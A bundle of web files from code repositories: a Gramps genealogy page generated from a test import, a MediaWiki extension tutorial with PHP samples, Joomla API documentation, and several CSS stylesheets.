<link href="../../../css/narrative-screen.css" media="screen" rel="stylesheet" type="text/css" />
<link href="../../../css/narrative-print.css" media="print" rel="stylesheet" type="text/css" />
<link href="../../../css/ancestortree.css" media="screen" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="header">
<h1 id="SiteTitle">My Family Tree</h1>
</div>
<div class="wrapper" id="nav" role="navigation">
<div class="container">
<ul class="menu" id="dropmenu">
<li class = "CurrentSection"><a href="../../../individuals.html" title="Individuals">Individuals</a></li>
<li><a href="../../../index.html" title="Surnames">Surnames</a></li>
<li><a href="../../../places.html" title="Places">Places</a></li>
<li><a href="../../../sources.html" title="Sources">Sources</a></li>
<li><a href="../../../media.html" title="Media">Media</a></li>
<li><a href="../../../thumbnails.html" title="Thumbnails">Thumbnails</a></li>
</ul>
</div>
</div>
<div class="content" id="IndividualDetail">
<h3>Martín, Tyler William<sup><small> <a href="#sref1">1</a></small></sup></h3>
<div id="summaryarea">
<table class="infolist">
<tr>
<td class="ColumnAttribute">Birth Name</td>
<td class="ColumnValue">
Martín, Tyler William
</td>
</tr>
<tr>
<td class="ColumnAttribute">Gramps ID</td>
<td class="ColumnValue">I1043</td>
</tr>
<tr>
<td class="ColumnAttribute">Gender</td>
<td class="ColumnValue">male</td>
</tr>
</table>
</div>
<div class="subsection" id="events">
<h4>Events</h4>
<table class="infolist eventlist">
<thead>
<tr>
<th class="ColumnEvent">Event</th>
<th class="ColumnDate">Date</th>
<th class="ColumnPlace">Place</th>
<th class="ColumnDescription">Description</th>
<th class="ColumnNotes">Notes</th>
<th class="ColumnSources">Sources</th>
</tr>
</thead>
<tbody>
<tr>
<td class="ColumnEvent">
Birth
</td>
<td class="ColumnDate">1993-11-29</td>
<td class="ColumnPlace"> </td>
<td class="ColumnDescription">
Birth of Martín, Tyler William
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
<tr>
<td class="ColumnEvent">
LVG
</td>
<td class="ColumnDate"> </td>
<td class="ColumnPlace"> </td>
<td class="ColumnDescription">
Custom FTW5 tag to specify LIVING not specified in GEDCOM 5.5
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
</tbody>
</table>
</div>
<div class="subsection" id="parents">
<h4>Parents</h4>
<table class="infolist">
<thead>
<tr>
<th class="ColumnAttribute">Relation to main person</th>
<th class="ColumnValue">Name</th>
<th class="ColumnValue">Relation within this family (if not by birth)</th>
</tr>
</thead>
<tbody>
</tbody>
<tr>
<td class="ColumnAttribute">Father</td>
<td class="ColumnValue">
<a href="../../../ppl/r/9/PIEKQCKUL6OAMS8Q9R.html">Martín<span class="grampsid"> [I1042]</span></a>
</td>
</tr>
<tr>
<td class="ColumnAttribute">Mother</td>
<td class="ColumnValue">
<a href="../../../ppl/d/u/5IEKQCN37EFBK9EBUD.html">Garner, Melissa Sue<span class="grampsid"> [I1041]</span></a>
</td>
</tr>
<tr>
<td class="ColumnAttribute"> </td>
<td class="ColumnValue"> <a href="../../../ppl/u/c/4JEKQC22K5UTH9QHCU.html">Martín, Tyler William<span class="grampsid"> [I1043]</span></a></td>
<td class="ColumnValue"></td>
</tr>
</table>
</div>
<div class="subsection" id="pedigree">
<h4>Pedigree</h4>
<ol class="pedigreegen">
<li>
<a href="../../../ppl/r/9/PIEKQCKUL6OAMS8Q9R.html">Martín<span class="grampsid"> [I1042]</span></a>
<ol>
<li class="spouse">
<a href="../../../ppl/d/u/5IEKQCN37EFBK9EBUD.html">Garner, Melissa Sue<span class="grampsid"> [I1041]</span></a>
<ol>
<li class="thisperson">
Martín, Tyler William
</li>
</ol>
</li>
</ol>
</li>
</ol>
</div>
<div class="subsection" id="tree">
<h4>Ancestors</h4>
<div id="treeContainer" style="width:735px; height:602px;">
<div class="boxbg male AncCol0" style="top: 269px; left: 6px;">
<a class="noThumb" href="../../../ppl/u/c/4JEKQC22K5UTH9QHCU.html">
Martín, Tyler William
</a>
</div>
<div class="shadow" style="top: 274px; left: 10px;"></div>
<div class="bvline" style="top: 301px; left: 165px; width: 15px"></div>
<div class="gvline" style="top: 306px; left: 165px; width: 20px"></div>
<div class="boxbg male AncCol1" style="top: 119px; left: 196px;">
<a class="noThumb" href="../../../ppl/r/9/PIEKQCKUL6OAMS8Q9R.html">
Martín
</a>
</div>
<div class="shadow" style="top: 124px; left: 200px;"></div>
<div class="bvline" style="top: 151px; left: 180px; width: 15px;"></div>
<div class="gvline" style="top: 156px; left: 185px; width: 20px;"></div>
<div class="bhline" style="top: 151px; left: 180px; height: 150px;"></div>
<div class="gvline" style="top: 156px; left: 185px; height: 150px;"></div>
<div class="boxbg female AncCol1" style="top: 419px; left: 196px;">
<a class="noThumb" href="../../../ppl/d/u/5IEKQCN37EFBK9EBUD.html">
Garner, Melissa Sue
</a>
</div>
<div class="shadow" style="top: 424px; left: 200px;"></div>
<div class="bvline" style="top: 451px; left: 180px; width: 15px;"></div>
<div class="gvline" style="top: 456px; left: 185px; width: 20px;"></div>
<div class="bhline" style="top: 301px; left: 180px; height: 150px;"></div>
<div class="gvline" style="top: 306px; left: 185px; height: 150px;"></div>
<div class="bvline" style="top: 451px; left: 355px; width: 15px"></div>
<div class="gvline" style="top: 456px; left: 355px; width: 20px"></div>
<div class="boxbg male AncCol2" style="top: 344px; left: 386px;">
<a class="noThumb" href="../../../ppl/a/j/UAXJQC6HC354V7Q6JA.html">
Garner, Francis William
</a>
</div>
<div class="shadow" style="top: 349px; left: 390px;"></div>
<div class="bvline" style="top: 376px; left: 370px; width: 15px;"></div>
<div class="gvline" style="top: 381px; left: 375px; width: 20px;"></div>
<div class="bhline" style="top: 376px; left: 370px; height: 75px;"></div>
<div class="gvline" style="top: 381px; left: 375px; height: 75px;"></div>
<div class="bvline" style="top: 376px; left: 545px; width: 15px"></div>
<div class="gvline" style="top: 381px; left: 545px; width: 20px"></div>
<div class="boxbg male AncCol3" style="top: 307px; left: 576px;">
<a class="noThumb" href="../../../ppl/9/k/SMWJQCXQ6I2GEXSPK9.html">
Garner, Eugene Stanley, Jr.
</a>
</div>
<div class="shadow" style="top: 312px; left: 580px;"></div>
<div class="bvline" style="top: 339px; left: 560px; width: 15px;"></div>
<div class="gvline" style="top: 344px; left: 565px; width: 20px;"></div>
<div class="bhline" style="top: 339px; left: 560px; height: 37px;"></div>
<div class="gvline" style="top: 344px; left: 565px; height: 37px;"></div>
<div class="boxbg female AncCol3" style="top: 381px; left: 576px;">
<a class="noThumb" href="../../../ppl/t/7/J9XJQC7HIKP3GC3A7T.html">
Pelletier, Josephine
</a>
</div>
<div class="shadow" style="top: 386px; left: 580px;"></div>
<div class="bvline" style="top: 413px; left: 560px; width: 15px;"></div>
<div class="gvline" style="top: 418px; left: 565px; width: 20px;"></div>
<div class="bhline" style="top: 376px; left: 560px; height: 37px;"></div>
<div class="gvline" style="top: 381px; left: 565px; height: 37px;"></div>
<div class="boxbg female AncCol2" style="top: 494px; left: 386px;">
<a class="noThumb" href="../../../ppl/w/n/OHEKQC8EADMX49HKNW.html">
Gibbs, Connie
</a>
</div>
<div class="shadow" style="top: 499px; left: 390px;"></div>
<div class="bvline" style="top: 526px; left: 370px; width: 15px;"></div>
<div class="gvline" style="top: 531px; left: 375px; width: 20px;"></div>
<div class="bhline" style="top: 451px; left: 370px; height: 75px;"></div>
<div class="gvline" style="top: 456px; left: 375px; height: 75px;"></div>
</div>
</div>
<div class="subsection" id="sourcerefs">
<h4>Source References</h4>
<ol>
<li>
<a href="../../../src/x/a/X5TJQC9JXU4RKT6VAX.html" title="Import from test2.ged" name ="sref1">
Import from test2.ged
<span class="grampsid"> [S0003]</span>
</a>
</li>
</ol>
</div>
</div>
<div class="fullclear"></div>
<div id="footer">
<p id="createdate">
Generated by <a href="http://gramps-project.org/">Gramps</a> 4.2.2 on 2015-12-25<br />Last change was the 2007-07-26 08:34:25
</p>
<p id="copyright">
</p>
</div>
</body>
</html>
|
components/com_jce/editor/tiny_mce/plugins/searchreplace/css/searchreplace.css | liyansa/uninews | /*JCE Editor - 2.3.3.1 | 11 July 2013 | http://www.joomlacontenteditor.net | Copyright (C) 2006 - 2013 Ryan Demmer. All rights reserved | GNU/GPL Version 2 or later - http://www.gnu.org/licenses/gpl-2.0.html*/
.ui-tabs-panel{height:100px;}#jce label[for$="_backwardsu"],#jce label[for$="_backwardsd"]{min-width:40px;} |
wiki-pages/Mediawiki_Extension_Tutorial.html | chenqingji/qing-meidiawiki-bootstrap | __NOTOC__
{{DISPLAYTITLE:扩展教程}}
<div class="col-md-12" style="border:1px solid #E74C3C;border-radius:5px;padding 10px;margin-bottom:20px;">
<h4>Mediawiki Custom Extension Tutorial</h4>
<p class="text-justify">This tutorial is part of a series of articles about creating skins, extensions and aspects of Mediawiki that appear to be missing from the Mediawiki documentation, it is for people that want to learn, but lack the necessary knowledge to get started. As with the other articles I've also included the downloadable files, so that you can have a go at creating an extension yourself.</p>
<h5>Extension Folders and Files</h5>
<p>You can skip the tutorial and download the files at the bottom of the page. As part of the learning process I would suggest changing the extension names etc, you will very likely break it but this will help you to understand how it all fits together a lot quicker.</p>
<p>Create the following folders and files in the Mediawiki extensions folder;</p>
<ul class="list-unstyled">
<li>
<span><i class="fa fa-folder-open"></i> extensions</span>
<ul class="list-unstyled">
<li>
<span><i class="fa fa-folder-open"></i> YourCustomExtension</span>
<ul class="list-unstyled">
<li>
<span><i class="fa fa-file-o"></i> YourCustomExtension.i18n.php</span>
</li>
<li>
<span><i class="fa fa-file-o"></i> YourCustomExtension.php</span>
</li>
</ul>
<ul class="list-unstyled">
<li>
<span><i class="fa fa-folder-open"></i> modules</span>
<ul class="list-unstyled">
<li>
<span><i class="fa fa-file-o"></i> ext.yourjavascript.js</span>
</li>
<li>
<span><i class="fa fa-file-o"></i> ext.output.js</span>
</li>
<li>
<span><i class="fa fa-file-o"></i> ext.yourstylesheet.css</span>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<div style="margin-bottom:20px;"></div>
<h5>YourCustomExtension.i18n.php</h5>
<pre>
<?php
/**
*
*
* @file
* @ingroup Extensions
*/
$messages = array();
$messages['en'] = array(
'yourcustom' => 'Custom',
'yourcustom-desc' => 'A short phrase describing your extension',
);
</pre>
<h5>YourCustomExtension.php</h5>
<pre>
<?php
if ( !defined( 'MEDIAWIKI' ) ) die();
$wgExtensionCredits['other'][] = array(
'path' => __FILE__,
'name' => 'YourCustomExtension',
'author' => array(
'[http://www.yoururl.com John Smith ]',
),
'descriptionmsg' => 'yourcustom-desc',
'url' => 'http://www.yoururl.com',
);
$wgExtensionMessagesFiles['YourCustomExtension'] = __DIR__ . '/YourCustomExtension.i18n.php';
$wgResourceModules['ext.YourCustomExtension'] = array(
'scripts' => array('modules/ext.yourjavascript.js','modules/ext.output.js'),
'styles' => array('modules/ext.yourstylesheet.css'),
'localBasePath' => __DIR__,
'remoteExtPath' => 'YourCustomExtension',
);
$wgHooks['BeforePageDisplay'][] = 'addSomeExtension';
function addSomeExtension( OutputPage &$out, Skin &$skin ) {
$out->addModules( ext.YourCustomExtension' );
return true;
}
</pre>
<p>Note: I've included a file entitled ext.output.js, this is what I use to call the JavaScripts, this isn't how the Mediawiki Core team do it, but I find its better to keep all the code together rather than use Mediawiki:Common.js, which is also prone to breaking when you include JavaScript variables.</p>
<h5>Installation</h5>
<pre>require_once "$IP/extensions/YourCustomExtension/YourCustomExtension.php";</pre>
<h5>Use Case - Love Bootstrap but want to use Vector?</h5>
<p>Using the following tutorial you can create a custom bootstrap extension for Mediawiki that works with Vector.</p>
<ul class="list-unstyled">
<li>
<span><i class="fa fa-folder-open"></i> extensions</span>
<ul class="list-unstyled">
<li>
<span><i class="fa fa-folder-open"></i> Bootstrap</span>
<ul class="list-unstyled">
<li>
<span><i class="fa fa-file-o"></i> bootstrap.i18n.php</span>
</li>
<li>
<span><i class="fa fa-file-o"></i> bootstrap.php</span>
</li>
</ul>
<ul class="list-unstyled">
<li>
<span><i class="fa fa-folder-open"></i> modules</span>
<ul class="list-unstyled">
<li>
<span><i class="fa fa-file-o"></i> ext.bootstrap.css</span>
</li>
<li>
<span><i class="fa fa-file-o"></i> ext.bootstrap.js</span>
</li>
<li>
<span><i class="fa fa-file-o"></i> ext.bootstrap-theme.css</span>
</li>
<li>
<span><i class="fa fa-file-o"></i> ext.output.js</span>
</li>
<li>
<span><i class="fa fa-file-o"></i> ext.theme.css</span>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<div style="margin-bottom:20px;"></div>
<h5>bootstrap.i18n.php</h5>
<pre>
<?php
/**
*
*
* @file
* @ingroup Extensions
*/
$messages = array();
$messages['en'] = array(
'bootstrap' => 'Bootstrap',
'bootstrap-desc' => 'Bootstrap extension for Mediawiki',
);
</pre>
<h5>bootstrap.php</h5>
<pre>
<?php
if ( !defined( 'MEDIAWIKI' ) ) die();
$wgExtensionCredits['other'][] = array(
'path' => __FILE__,
'name' => 'Bootstrap',
'author' => array(
'[http://www.yoururl.com John Smith ]',
),
'descriptionmsg' => 'bootstrap-desc',
'url' => 'http://www.yoururl.com',
);
$wgExtensionMessagesFiles['Bootstrap'] = __DIR__ . '/bootstrap.i18n.php';
$wgResourceModules['ext.bootstrap'] = array(
'scripts' => array(
'modules/ext.bootstrap.js',
'modules/ext.output.js',
),
'styles' => array(
'modules/ext.bootstrap.css',
'modules/ext.bootstrap-theme.css',
'modules/ext.theme.css'
),
'localBasePath' => __DIR__,
'remoteExtPath' => 'Bootstrap',
);
$wgHooks['BeforePageDisplay'][] = 'addBootstrap';
function addBootstrap( OutputPage &$out, Skin &$skin ) {
$out->addModules( 'ext.bootstrap' );
return true;
}
</pre>
<h5>Install</h5>
<pre>require_once "$IP/extensions/Bootstrap/bootstrap.php";</pre>
<h5>Application</h5>
<p>Use the [http://getbootstrap.com/css/ Bootstrap docs] to apply the styles to your wiki.</p>
<p><strong>Use Bootstraps docs in combination with our docs as some of the classes need to be modified to work with Mediawiki e.g. buttons.</strong></p>
<p><div class="btn btn-default">[http://mediawikibootstrapskin.9ong.com/index.php?title=Bootstrapskin_Extensions#Bootstrap_Extension Download Bootstrap Extension.]</div></p>
</div>
[[Category: Mediawiki Tutorials]]
|
Joomla-Site/com_users/_components---com_users---views---registration---view.html.php.html | asika32764/Joomla-CMS-API-Document | <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- template designed by Marco Von Ballmoos -->
<title>Docs for page view.html.php</title>
<link rel="stylesheet" href="../../media/stylesheet.css" />
<script src="../../media/lib/classTree.js"></script>
<script language="javascript" type="text/javascript">
var imgPlus = new Image();
var imgMinus = new Image();
imgPlus.src = "../../media/images/plus.png";
imgMinus.src = "../../media/images/minus.png";
function showNode(Node){
switch(navigator.family){
case 'nn4':
// Nav 4.x code fork...
var oTable = document.layers["span" + Node];
var oImg = document.layers["img" + Node];
break;
case 'ie4':
// IE 4/5 code fork...
var oTable = document.all["span" + Node];
var oImg = document.all["img" + Node];
break;
case 'gecko':
// Standards Compliant code fork...
var oTable = document.getElementById("span" + Node);
var oImg = document.getElementById("img" + Node);
break;
}
oImg.src = imgMinus.src;
oTable.style.display = "block";
}
function hideNode(Node){
switch(navigator.family){
case 'nn4':
// Nav 4.x code fork...
var oTable = document.layers["span" + Node];
var oImg = document.layers["img" + Node];
break;
case 'ie4':
// IE 4/5 code fork...
var oTable = document.all["span" + Node];
var oImg = document.all["img" + Node];
break;
case 'gecko':
// Standards Compliant code fork...
var oTable = document.getElementById("span" + Node);
var oImg = document.getElementById("img" + Node);
break;
}
oImg.src = imgPlus.src;
oTable.style.display = "none";
}
function nodeIsVisible(Node){
switch(navigator.family){
case 'nn4':
// Nav 4.x code fork...
var oTable = document.layers["span" + Node];
break;
case 'ie4':
// IE 4/5 code fork...
var oTable = document.all["span" + Node];
break;
case 'gecko':
// Standards Compliant code fork...
var oTable = document.getElementById("span" + Node);
break;
}
return (oTable && oTable.style.display == "block");
}
function toggleNodeVisibility(Node){
if (nodeIsVisible(Node)){
hideNode(Node);
}else{
showNode(Node);
}
}
</script>
</head>
<body>
<div class="page-body">
<h2 class="file-name"><img src="../../media/images/Page_logo.png" alt="File" style="vertical-align: middle">/components/com_users/views/registration/view.html.php</h2>
<a name="sec-description"></a>
<div class="info-box">
<div class="info-box-title">Description</div>
<div class="nav-bar">
<span class="disabled">Description</span> |
<a href="#sec-classes">Classes</a>
</div>
<div class="info-box-body">
<!-- ========== Info from phpDoc block ========= -->
<ul class="tags">
<li><span class="field">copyright:</span> Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.</li>
<li><span class="field">filesource:</span> <a href="../../filesource/fsource_Joomla-Site_com_users_componentscom_usersviewsregistrationview.html.php.html">Source Code for this file</a></li>
<li><span class="field">license:</span> GNU</li>
</ul>
</div>
</div>
<a name="sec-classes"></a>
<div class="info-box">
<div class="info-box-title">Classes</div>
<div class="nav-bar">
<a href="#sec-description">Description</a> |
<span class="disabled">Classes</span>
</div>
<div class="info-box-body">
<table cellpadding="2" cellspacing="0" class="class-table">
<tr>
<th class="class-table-header">Class</th>
<th class="class-table-header">Description</th>
</tr>
<tr>
<td style="padding-right: 2em; vertical-align: top; white-space: nowrap">
<img src="../../media/images/Class.png"
alt=" class"
title=" class"/>
<a href="../../Joomla-Site/com_users/UsersViewRegistration.html">UsersViewRegistration</a>
</td>
<td>
Registration view class for Users.
</td>
</tr>
</table>
</div>
</div>
<p class="notes" id="credit">
Documentation generated on Tue, 19 Nov 2013 15:16:50 +0100 by <a href="http://www.phpdoc.org" target="_blank">phpDocumentor 1.4.3</a>
</p>
</div></body>
</html> |
lab/g24/site/css/screen.css | matt-tyas/matthewtyas.com | @charset "UTF-8";
/*------------------------------------*\
SCREEN.CSS
\*------------------------------------*/
/*------------------------------------*\
$RESET
\*------------------------------------*/
body,
h1, h2, h3, h4, h5, h6,
p, blockquote, pre,
dl, dd, ol, ul,
form, fieldset, legend,
table, th, td, caption,
figure,
hr {
margin: 0;
padding: 0; }
article, aside, details, figcaption, figure, footer,
header, hgroup, menu, nav, section {
display: block; }
table {
border-collapse: collapse;
border-spacing: 0; }
strong, b, mark {
font-weight: bold;
font-style: inherit; }
em, i, cite, q, address, dfn, var {
font-style: italic;
font-weight: inherit; }
abbr[title], dfn[title] {
cursor: help;
border-bottom: 1px dotted; }
ins {
border-bottom: 1px solid; }
a, u, ins {
text-decoration: none; }
del, s {
text-decoration: line-through; }
img {
border: none;
font-style: italic; }
input,
select, option, optgroup,
textarea {
font: inherit; }
/*------------------------------------*\
$CLEARFIX
\*------------------------------------*/
/**
* Micro clearfix, as per: nicolasgallagher.com/micro-clearfix-hack
*/
.cf:before,
.cf:after {
content: " ";
display: table;
}
.cf:after {
clear: both;
}
.cf {
*zoom: 1;
}
/*------------------------------------*\
$MAIN
\*------------------------------------*/
html {
font: 1em/1.5 serif;
overflow-y: scroll; }
body.bg {
background: #444 url(../images/bg.png) repeat-x;
font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
}
/*------------------------------------*\
$HEADINGS
\*------------------------------------*/
h1, h2, h3, h4, h5, span, label, input[type=submit], dt, .vcard div.street-address {
font-family: Georgia, Times, "Times New Roman", serif;
}
h1, .h1 {
font-size: 36px;
font-size: 2.25rem;
line-height: 1.33333; }
h2, .h2 {
font-size: 30px;
font-size: 1.875rem;
line-height: 1.6; }
h3, .h3 {
font-size: 24px;
font-size: 1.5rem;
line-height: 1; }
h4, .h4 {
font-size: 20px;
font-size: 1.25rem;
line-height: 1.2; }
h5, .h5 {
font-size: 16px;
font-size: 1rem;
line-height: 1.5; }
h6, .h6 {
font-size: 14px;
font-size: 0.875rem;
line-height: 1.71429; }
/*------------------------------------*\
$PARAGRAPHS
\*------------------------------------*/
p {
font-size: 12px;
font-size: 0.75rem;
line-height: 1.71429;
margin-bottom: 10px;
}
/*------------------------------------*\
$SMALLPRINT
\*------------------------------------*/
.smallprint {
font-size: 11px;
font-size: 0.65rem;
line-height: 2;
line-height: 1;
}
/*------------------------------------*\
$LINKS
\*------------------------------------*/
a { }
a:hover,
a:active,
a:focus {
text-decoration: underline;
}
/*------------------------------------*\
$LISTS
\*------------------------------------*/
/**
* Remove vertical spacing from nested lists.
*/
ul {
font-size: 12px;
font-size: 0.75rem;
padding: 20px 20px 20px 39px;
list-style-image: url(../images/bullet.png);
}
li {
margin-bottom: 10px;
}
dl {
font-size: 12px;
font-size: 0.75rem;
color: #fff;
padding: 20px 20px 20px 20px;
}
dt {
font-size: 14px;
font-size: 0.875rem;
color: #FE6300;
padding-left: 35px;
height: 35px;
background: url(../images/tick.png) top left no-repeat;
}
dd {
margin-bottom: 10px;
padding-left: 35px;
margin-top: -15px;
}
/*------------------------------------*\
$FORMS
\*------------------------------------*/
form {
padding: 10px;
}
input[type=text],
input[type=email] {
width: 236px;
margin-bottom: 10px;
-webkit-box-shadow: inset 0px 0px 3px 3px rgba(0, 0, 0, 0.2);
box-shadow: inset 0px 0px 3px 3px rgba(0, 0, 0, 0.2);
}
input[type=submit] {
width: 100%;
border: 3px solid #149D1B;
background: #91be3c; /* Old browsers */
background: -moz-linear-gradient(top, #91be3c 0%, #149d1b 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#91be3c), color-stop(100%,#149d1b)); /* Chrome,Safari4+ */
background: -webkit-linear-gradient(top, #91be3c 0%,#149d1b 100%);
background: -o-linear-gradient(top, #91be3c 0%,#149d1b 100%);
background: -ms-linear-gradient(top, #91be3c 0%,#149d1b 100%);
background: linear-gradient(to bottom, #91be3c 0%,#149d1b 100%);
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#91be3c', endColorstr='#149d1b',GradientType=0 );
cursor: pointer;
color: #fff;
text-shadow: 0px 1px 0px #000;
}
select {
width: 244px;
margin-bottom: 10px;
}
label {
display: block;
color: #fff;
text-shadow: 0px 1px 0px #000;
}
#result span {
color: #468847;
background-color: #DFF0D8;
border: 3px solid #468847;
width: 226px;
padding: 5px;
margin: 10px 10px 0px 10px;
display: block;
}
/*------------------------------------*\
$LAYOUT
\*------------------------------------*/
.wrap {
overflow: hidden;
}
.wrap {
width: 1024px;
margin: 0 auto;
padding: 0px 10px;
}
/* header */
header[role=banner] {
width: 1024px;
height: 152px;
overflow: hidden;
position: relative;
}
/* header > brand */
h1.brand a {
width: 213px;
height: 121px;
float: left;
margin: 10px 20px;
background: url(../images/brand.png);
text-indent: 100%;
white-space: nowrap;
overflow: hidden;
}
/* header > cta */
.contact-cta {
width: 220px;
float: right;
text-align: right;
margin: 10px 20px;
}
.contact-cta span {
color: #fff;
display: block;
line-height: 1.25;
}
.contact-cta span.phone {
font-size: 30px;
font-size: 1.875rem;
color: #FE6300;
}
/* masthead */
section.masthead {
width: 1024px;
height: 295px;
background-color: black;
}
/* masthead > slider */
.slider {
width: 400px;
height: 295px;
float: left;
position: relative;
}
.slider div.slides {
height: 295px;
}
.slider .caption {
position: absolute;
top: 0px;
bottom: 0px;
padding: 10px 20px;
}
.ie7 .slider .caption {
left: 0px;
}
.caption h2 span {
display: block;
}
.caption h2 span.title {
color: #fff;
font-weight: lighter;
text-shadow: 0px 1px 0px #000;
font-size: 28px;
font-size: 1.75rem;
margin-bottom: 5px;
}
.caption h2 {
line-height: 1.2;
}
.caption h2 span.sub-title {
color: #FE6300;
font-weight: lighter;
text-shadow: 0px 1px 0px #000;
font-size: 20px;
font-size: 1.25rem;
}
.caption h2 span.sub-title-2 {
color: #FE6300;
font-weight: lighter;
text-shadow: 0px 1px 0px #000;
font-size: 28px;
font-size: 1.75rem;
margin-bottom: 5px;
margin-top: 90px;
}
.ie7 .caption h2 span.sub-title-2 {
margin-top: 60px;
}
.caption h2 span.smallprint {
color: #fff;
font-weight: lighter;
text-shadow: 0px 1px 0px #000;
font-size: 12px;
font-size: 0.75rem;
margin-bottom: 0px;
}
body.ie8 span.sub-title-2 {
margin-top: 70px;
}
/* masthead > mobiles */
.mobiles {
width: 301px;
height: 318px;
float: left;
position: relative;
bottom: 40px;
left: 20px;
z-index: 9999;
}
/* masthead > form */
.enquiry-form {
width: 264px;
height: auto;
float: left;
position: relative;
bottom: 40px;
left: 40px;
z-index: 9999;
background-color: #FE6300;
}
/* mid section */
.benefits-information,
.contact-info {
overflow: hidden;
width: 1024px;
position: relative;
bottom: 23px;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
-ms-box-sizing: border-box;
-o-box-sizing: border-box;
box-sizing: border-box;
}
div.col-25 {
width: 25%;
float: left;
}
div.col-25 h3 {
font-size: 18px;
font-size: 1.2rem;
line-height: 1;
color: #fff;
text-shadow: 0px 1px 0px #000;
font-weight: lighter;
border-left: 1px solid #ccc;
padding: 12px 10px 12px 20px;
background: #dc4a04; /* Old browsers */
background: -moz-linear-gradient(top, #dc4a04 0%, #fa6216 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#dc4a04), color-stop(100%,#fa6216));
background: -webkit-linear-gradient(top, #dc4a04 0%,#fa6216 100%);
background: -o-linear-gradient(top, #dc4a04 0%,#fa6216 100%);
background: -ms-linear-gradient(top, #dc4a04 0%,#fa6216 100%);
background: linear-gradient(to bottom, #dc4a04 0%,#fa6216 100%);
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#dc4a04', endColorstr='#fa6216',GradientType=0 );
}
div.col-25:first-of-type h3,
div.col-50:first-of-type h4 {
border-left: 0px;
}
div.col-25 div {
height: 290px;
}
div.col-25 div.how-it-works {
background-color: #333;
}
div.col-25 div.benefits,
div.col-25 div.supported {
background-color: #fff;
border-left: 1px solid #ccc;
}
div.col-25 div.supported iframe {
margin: 20px 20px 0px 20px;
}
div.col-25 div.supported img{
margin: 7px 20px 0px 20px;
}
/* Info and contact */
.contact-info {
background-color: #fff;
height: 547px;
}
div.col-50 {
width: 50%;
float: left;
}
div.col-50 h4 {
font-size: 18px;
font-size: 1.2rem;
line-height: 1;
color: #fff;
text-shadow: 0px 1px 0px #000;
font-weight: lighter;
border-left: 1px solid #ccc;
padding: 12px 10px 12px 20px;
background: #4d4d4d; /* Old browsers */
background: -moz-linear-gradient(top, #4d4d4d 0%, #646464 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#4d4d4d), color-stop(100%,#646464));
background: -webkit-linear-gradient(top, #4d4d4d 0%,#646464 100%);
background: -o-linear-gradient(top, #4d4d4d 0%,#646464 100%);
background: -ms-linear-gradient(top, #4d4d4d 0%,#646464 100%);
background: linear-gradient(to bottom, #4d4d4d 0%,#646464 100%);
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#4d4d4d', endColorstr='#646464',GradientType=0 );
}
div.col-50 div {
overflow: hidden;
background-color: #fff;
padding: 20px;
}
div.col-50 div.col-50 {
padding: 0px;
}
div.col-50 h5 {
font-weight: lighter;
font-size: 18px;
font-size: 1.2rem;
line-height: 1.5;
}
div.col-50 div.col-50 img {
margin: 30px 0px 0px 30px;
}
div.col-50 div div {
padding: 0px;
}
div.col-50 iframe {
margin-bottom: 20px;
}
/* Vcards */
.vcard {
margin-bottom: 20px;
}
.vcard div,
.vcard span {
display: block;
font-size: 12px;
font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
}
.vcard div.org {
font-size: 11px;
color: #333;
}
.vcard div.street-address {
color: #FE6300;
font-size: 16px;
}
/*------------------------------------*\
$FOOTER
\*------------------------------------*/
footer {
height: 100px;
padding: 0px 20px 20px 20px;
color: #fff;
}
footer ul {
padding: 0px;
text-align: right;
}
div.col-15 {
width: 15%;
float: left;
}
div.col-75 {
width: 75%;
float: left;
}
/*------------------------------------*\
$NAV
\*------------------------------------*/
/**
* Nav abstraction as per: csswizardry.com/2011/09/the-nav-abstraction
* When used on an `ol` or `ul`, this class throws the list into horizontal mode
*/
.nav {
list-style: none;
margin-left: 0; }
.nav > li,
.nav > li > a {
display: inline-block;
*display: inline;
zoom: 1; }
.nav--stacked > li {
display: list-item; }
.nav--stacked > li > a {
display: block; }
.nav--banner {
text-align: center; }
/*------------------------------------*\
$MEDIA
\*------------------------------------*/
/**
* Place any image- and text-like content side-by-side, as per:
* stubbornella.org/content/2010/06/25/the-media-object-saves-hundreds-of-lines-of-code
*/
.media {
display: block; }
.media__img {
float: left;
margin-right: 24px; }
/**
* Reversed image location (right instead of left).
*/
.media__img--rev {
float: right;
margin-left: 24px; }
.media__img img,
.media__img--rev img {
display: block; }
.media__body {
overflow: hidden; }
.media__body,
.media__body > :last-child {
margin-bottom: 0; }
/**
* `.img`s in `.islet`s need an appropriately sized margin.
*/
.islet .media__img {
margin-right: 12px; }
.islet .media__img--rev {
margin-left: 12px; }
/*------------------------------------*\
$BUTTONS
\*------------------------------------*/
.btn {
font: inherit;
cursor: pointer;
border: none;
display: inline-block;
margin: 0;
line-height: 1;
padding: 0.5em; }
.btn,
.btn:hover {
text-decoration: none; }
.btn--sml {
font-size: .75em; }
.btn--lrg {
font-size: 1.50em; }
.btn--full {
display: block;
text-align: center;
padding-right: 0;
padding-left: 0;
width: 100%; }
/*------------------------------------*\
$HELPER
\*------------------------------------*/
.fr {
float: right; }
.fl {
float: left; }
.text-center,
.text-centre {
text-align: center; }
.accessibility {
position: absolute;
left: -99999px; } |
components/inc/css/datepicker.css | vieux-mazel/INet-MinutesMaker | /*!
* Datepicker for Bootstrap
*
* Copyright 2012 Stefan Petre
* Improvements by Andrew Rowls
* Licensed under the Apache License v2.0
* http://www.apache.org/licenses/LICENSE-2.0
*
*/
.datepicker {
